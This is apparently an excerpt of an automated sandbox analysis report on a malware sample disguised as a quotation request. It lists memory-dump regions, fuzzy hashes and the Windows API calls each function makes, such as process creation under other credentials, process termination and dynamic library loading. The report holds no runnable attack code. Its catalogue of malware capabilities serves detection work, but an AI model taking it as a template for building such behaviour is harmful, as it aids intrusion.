• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
• String ID:
• API String ID: 72514467-0
• Opcode ID: ef99c3a81363cabffdca455dd97d06768d3ac8a283110263ed40540994181a4f
• Instruction ID: 75256d49171b57bc942f7609308e20f0b59d6e8ce39c65898f1749753bf723e0
• Opcode Fuzzy Hash: ef99c3a81363cabffdca455dd97d06768d3ac8a283110263ed40540994181a4f
• Instruction Fuzzy Hash: 3321DA72604114BBEB269B39EC45E7B7BACDF46760F10807AF80DCA151EB65EC00A6A1
APIs
  • Part of subcall function 00F13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F13A97,?,?,00F12E7F,?,?,?,00000000), ref: 00F13AC2
• _wcslen.LIBCMT ref: 00F8587B
• CoInitialize.OLE32(00000000), ref: 00F85995
• CoCreateInstance.OLE32(00FAFCF8,00000000,00000001,00FAFB68,?), ref: 00F859AE
• CoUninitialize.OLE32 ref: 00F859CC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• API String ID: 3172280962-24824748
• Opcode ID: 87e77d89a167187f1b3daba4564701e041067e6a8cf492b64a49f0f664f903d2
• Instruction ID: 87d38c6042043026f9a3693fa56da98230ae2a24634fd892b4c12cac01c4e837
• Opcode Fuzzy Hash: 87e77d89a167187f1b3daba4564701e041067e6a8cf492b64a49f0f664f903d2
• Instruction Fuzzy Hash: BDD15571A087019FC714EF14C880AAABBF2FF89B24F144859F8899B361D735EC45DB92
APIs
  • Part of subcall function 00F70FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F70FCA
  • Part of subcall function 00F70FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F70FD6
  • Part of subcall function 00F70FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F70FE5
  • Part of subcall function 00F70FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F70FEC
  • Part of subcall function 00F70FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F71002
• GetLengthSid.ADVAPI32(?,00000000,00F71335), ref: 00F717AE
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F717BA
• HeapAlloc.KERNEL32(00000000), ref: 00F717C1
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00F717DA
• GetProcessHeap.KERNEL32(00000000,00000000,00F71335), ref: 00F717EE
• HeapFree.KERNEL32(00000000), ref: 00F717F5
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: bb6bf71d435d93a6c50c7011e2665952af69a55db8e56f40b58d01c8aa5d50a6
• Instruction ID: 17e6242355e02ca238a357edf6eefa99166ca81001cd5b0b120e2757051bd19e
• Opcode Fuzzy Hash: bb6bf71d435d93a6c50c7011e2665952af69a55db8e56f40b58d01c8aa5d50a6
• Instruction Fuzzy Hash: EE11AF71A00209EFDB149FA8CC49BAF7BB9FB42365F10C019F44597111C7359949EBA1
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F714FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00F71506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F71515
• CloseHandle.KERNEL32(00000004), ref: 00F71520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F7154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00F71563
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
• GetLastError.KERNEL32(?,?,00F33379,00F32FE5), ref: 00F33390
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F3339E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F333B7
• SetLastError.KERNEL32(00000000,?,00F33379,00F32FE5), ref: 00F33409
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,00F45686,00F53CD6,?,00000000,?,00F45B6A,?,?,?,?,?,00F3E6D1,?,00FD8A48), ref: 00F42D78
• _free.LIBCMT ref: 00F42DAB
• _free.LIBCMT ref: 00F42DD3
• SetLastError.KERNEL32(00000000,?,?,?,?,00F3E6D1,?,00FD8A48,00000010,00F14F4A,?,?,00000000,00F53CD6), ref: 00F42DE0
• SetLastError.KERNEL32(00000000,?,?,?,?,00F3E6D1,?,00FD8A48,00000010,00F14F4A,?,?,00000000,00F53CD6), ref: 00F42DEC
• _abort.LIBCMT ref: 00F42DF2
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
  • Part of subcall function 00F29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F29693
  • Part of subcall function 00F29639: SelectObject.GDI32(?,00000000), ref: 00F296A2
  • Part of subcall function 00F29639: BeginPath.GDI32(?), ref: 00F296B9
  • Part of subcall function 00F29639: SelectObject.GDI32(?,00000000), ref: 00F296E2
• MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FA8A4E
• LineTo.GDI32(?,00000003,00000000), ref: 00FA8A62
• MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FA8A70
• LineTo.GDI32(?,00000000,00000003), ref: 00FA8A80
• EndPath.GDI32(?), ref: 00FA8A90
• StrokePath.GDI32(?), ref: 00FA8AA0
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
APIs
• GetDC.USER32(00000000), ref: 00F75218
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00F75229
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F75230
• ReleaseDC.USER32(00000000,00000000), ref: 00F75238
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F7524F
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F75261
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F11BF4
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00F11BFC
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F11C07
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F11C12
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00F11C1A
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00F11C22
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F7EB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F7EB46
• GetWindowThreadProcessId.USER32(?,?), ref: 00F7EB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7EB64
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7EB6E
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7EB75
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• GetClientRect.USER32(?), ref: 00F67452
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00F67469
• GetWindowDC.USER32(?), ref: 00F67475
• GetPixel.GDI32(00000000,?,?), ref: 00F67484
• ReleaseDC.USER32(?,00000000), ref: 00F67496
• GetSysColor.USER32(00000005), ref: 00F674B0
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 272304278-0
                                                                                                                    • Opcode ID: 676edd7aa39d931bbaa2689965166f5b670b7ef64642a6aadb5755f25f224760
                                                                                                                    • Instruction ID: 173d368597f43e42da51c5a98ad631c2a6d905e7a23a9d9446a62dcb010ce42d
                                                                                                                    • Opcode Fuzzy Hash: 676edd7aa39d931bbaa2689965166f5b670b7ef64642a6aadb5755f25f224760
                                                                                                                    • Instruction Fuzzy Hash: F7018B72800219EFDB10AF64DD08BAA7BB5FF06321F640060F919A21A0CF311E41BB90
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F7187F
                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00F7188B
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F71894
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F7189C
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F718A5
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F718AC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    • Opcode ID: 164c144de27216150ff323a5f10ad996f720d5b21834b5e987e9fabcacc640b7
                                                                                                                    • Instruction ID: c0bbc7e9369c8153c54fc01143a302e2db3a28abef6c169bd1f706689546e46c
                                                                                                                    • Opcode Fuzzy Hash: 164c144de27216150ff323a5f10ad996f720d5b21834b5e987e9fabcacc640b7
                                                                                                                    • Instruction Fuzzy Hash: FFE0EDB6104209BBDB015FA2ED0C906BF79FF4A7217108220F22581071CB325421EF90
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F17620: _wcslen.LIBCMT ref: 00F17625
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F7C6EE
                                                                                                                    • _wcslen.LIBCMT ref: 00F7C735
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F7C79C
                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F7C7CA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                                    • Opcode ID: 23602a0095893679aed85267fb5574f1df4064acf2de10998d377d5b30368d35
                                                                                                                    • Instruction ID: 9729bad80adfc058a2d29e022f5fe72a1d868410104051cbed0e8082296cc052
                                                                                                                    • Opcode Fuzzy Hash: 23602a0095893679aed85267fb5574f1df4064acf2de10998d377d5b30368d35
                                                                                                                    • Instruction Fuzzy Hash: D251D071A043009BD7189F29CC85B6B77E4AF89320F048A2EF999D31D1DB74D945BB93
                                                                                                                    APIs
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00F9AEA3
                                                                                                                      • Part of subcall function 00F17620: _wcslen.LIBCMT ref: 00F17625
                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00F9AF38
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F9AF67
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                    • String ID: <$@
                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                    • Opcode ID: 54bec623e512ad836021a7cda40a78bafe58b0d5916c86d4c9b32fd4fb6a6210
                                                                                                                    • Instruction ID: 87b7dc1f3b8bd114cb59d56391e8779455cbddbdd49abe02ce616fe04fc1bc5f
                                                                                                                    • Opcode Fuzzy Hash: 54bec623e512ad836021a7cda40a78bafe58b0d5916c86d4c9b32fd4fb6a6210
                                                                                                                    • Instruction Fuzzy Hash: FD716770A00619DFDF14EF55C884A9EBBF1BF08314F048499E81AAB252CB74ED85DB91
                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F77206
                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F7723C
                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F7724D
                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F772CF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                    • String ID: DllGetClassObject
                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                    • Opcode ID: a4e69430818d43f2565ad5e80989329f1fc584b93943570785ad4258c1a57950
                                                                                                                    • Instruction ID: 8ac9c41487fe1f3e9594cb37481311530ad8ab4e8400be4fabe12c7e8357ff46
                                                                                                                    • Opcode Fuzzy Hash: a4e69430818d43f2565ad5e80989329f1fc584b93943570785ad4258c1a57950
                                                                                                                    • Instruction Fuzzy Hash: 49419EB1A14304EFDB15DF54C884A9A7BA9EF44310F1480AABD09DF20AD7B0D944EFA1
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA3E35
                                                                                                                    • IsMenu.USER32(?), ref: 00FA3E4A
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FA3E92
                                                                                                                    • DrawMenuBar.USER32 ref: 00FA3EA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                    • Opcode ID: 610fdf4e9fed0cba79bfff97a16c72be18bae6ca0b3589517003477be9a01598
                                                                                                                    • Instruction ID: e72a7cb20db103fcbd2a33ce7990e3b23a550df5ce61309277fb65ae49a6e96a
                                                                                                                    • Opcode Fuzzy Hash: 610fdf4e9fed0cba79bfff97a16c72be18bae6ca0b3589517003477be9a01598
                                                                                                                    • Instruction Fuzzy Hash: C3412BB5E11209EFDB10DF50D8C4A9AB7B5FF46365F04411AF90597250D730AE49EF50
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F71E66
                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F71E79
                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F71EA9
                                                                                                                      • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                                    • Opcode ID: eee34adfc78481cc59158801a5643e52382330bf6ad62d59c6e98df5ae0b8e54
                                                                                                                    • Instruction ID: 1f48990b72069d93d8725b61c966d4c0d5b8ecd89e72d829cb939067f22f278c
                                                                                                                    • Opcode Fuzzy Hash: eee34adfc78481cc59158801a5643e52382330bf6ad62d59c6e98df5ae0b8e54
                                                                                                                    • Instruction Fuzzy Hash: 9D216B71A00108BEDB149B68DC56CFFB7B8EF42360B14812AF859A32E1DB785D4DB661
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FA2F8D
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00FA2F94
                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FA2FA9
                                                                                                                    • DestroyWindow.USER32(?), ref: 00FA2FB1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 3529120543-1011021900
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F34D1E,00F428E9,?,00F34CBE,00F428E9,00FD88B8,0000000C,00F34E15,00F428E9,00000002), ref: 00F34D8D
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F34DA0
• FreeLibrary.KERNEL32(00000000,?,?,?,00F34D1E,00F428E9,?,00F34CBE,00F428E9,00FD88B8,0000000C,00F34E15,00F428E9,00000002,00000000), ref: 00F34DC3
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F14EDD,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F14EAE
• FreeLibrary.KERNEL32(00000000,?,?,00F14EDD,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14EC0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
APIs
